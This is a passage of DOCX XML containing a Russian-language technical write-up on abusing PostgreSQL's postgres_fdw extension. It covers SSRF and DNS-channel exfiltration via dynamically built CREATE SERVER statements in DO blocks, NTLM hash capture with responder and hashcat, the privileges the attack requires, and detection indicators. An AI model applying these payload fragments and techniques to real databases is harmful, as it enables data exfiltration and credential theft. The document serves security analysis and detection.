        <w:t xml:space="preserve">). Windows-PG-процесс под доменной учёткой шлёт NTLM challenge → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на стороне атакующего захватывает NetNTLMv2 hash → offline-cracking (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 5600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Применимо: PostgreSQL on Windows + Active Directory.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PG on Linux/macOS — нет SMB-клиента в libpq, коннект к 445 просто упадёт.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Поверх трёх под-целей — DNS-эксфильтрация (общая, через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getaddrinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до TCP).</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 обёртка над libpq, делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQconnectdb()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> под капотом, идентично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getaddrinfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до TCP-handshake → DNS-канал работает даже если egress firewall режет outbound TCP.</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FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> открывает коннект — это только метаданные в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_foreign_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Коннект открывается на первом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PERFORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к foreign-таблице. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PERFORM * FROM t_ev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в payload обязателен.</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DO $$ BEGIN ... END $$;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">анонимный plpgsql-блок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PostgreSQL парсит и исполняет его как одну SQL-команду (одна запись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но внутри тело — целая plpgsql-программа с несколькими DDL/DML statements. Ключевой момент: цепочка из 5+ команд уходит на сервер как один statement, не требует ни stacked-queries (см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), ни прав на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(для CREATE FUNCTION нужен CREATE на схеме; для DO — нет, доступен по умолчанию). Side-effect (CREATE SERVER, USER MAPPING, FOREIGN TABLE) применяются в той же транзакции что и DO — при ошибке откат, при успехе остаются в каталоге как мусор.</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 format('... OPTIONS (host %L, ...)', expr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обязателен потому, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS (...)</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CREATE SERVER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USER MAPPING</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FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только строковые литералы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не expressions. Парсер обрабатывает значения OPTIONS на этапе DDL до evaluation выражений. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS (host current_user)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> падает с syntax error; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS (host '...')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с динамически собранной строкой работает только через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с placeholder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для безопасной literal-quote.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OPTIONS (host '')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при PERFORM не вызывает коннект, потому что libpq падает на пустом host раньше getaddrinfo. Поэтому повреждённый исходный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SERVER app_src OPTIONS (host '', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> безвреден — атакующий создаёт второй SERVER (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) с собственным host и работает только с ним.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">цепочки трёх привилегий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Частичная выдача не открывает атаку — нужны все три последовательно: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`USAGE ON FOREIGN DATA WRAPPER postgres_fdw`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — без этого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">permission denied for foreign-data wrapper postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. По умолчанию выдан только superuser-у (postgres_fdw NOT trusted). Можно делегировать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT USAGE ON FOREIGN DATA WRAPPER postgres_fdw TO appuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это даёт право создавать SERVER, но всё ещё не открывает атаку.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`CREATE` на текущей схеме</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нужно для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (таблица создаётся в search_path-первой схеме). По умолчанию роль имеет CREATE на своей user-schema;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после PG 15 — только у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_database_owner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Право `CREATE USER MAPPING`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — у владельца SERVER есть по умолчанию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CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> становится owner-ом).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительно: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`CREATE EXTENSION postgres_fdw`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельный шаг до атаки, требует superuser. Если extension уже установлен (RDS preinstalled, Kubernetes-операторы, любая managed-PG с включённым FDW) — шаг пропускается.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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14–17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доступен с 9.3; SSRF-поведение не менялось).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Egress:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP до целевого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host:port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для SSRF), UDP/53 до authoritative DNS атакующего (для DNS-канала).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Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2</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pg_foreign_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> foreign-серверы редко меняются — массовое создание/удаление в окне атаки = аномалия. Имена в стиле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ev_&lt;md5&gt;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t_ev</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t_meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — никогда не легитимны.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SERVER ... OPTIONS (host '&lt;подстановка&gt;')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через динамический SQL — в легитимном коде host всегда литерал.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pg_stat_activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от backend-процессов с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, содержащим одновременно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN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EXECUTE format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практически всегда атака; легитимная регистрация FDW делается админ-скриптами не из приложения.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Коннекты с PG-хоста на link-local (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">169.254.0.0/16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), broadcast, нестандартные порты в RFC1918-диапазонах, порты 445/3389/22 — почти никогда не легитимны.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DNS-запросы от PG-хоста к доменам с длинными hex-labels — общий маркер с 3.6.1 (см. там).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Резкий рост ошибок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">could not establish connection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connection refused</w:t>
      </w:r>
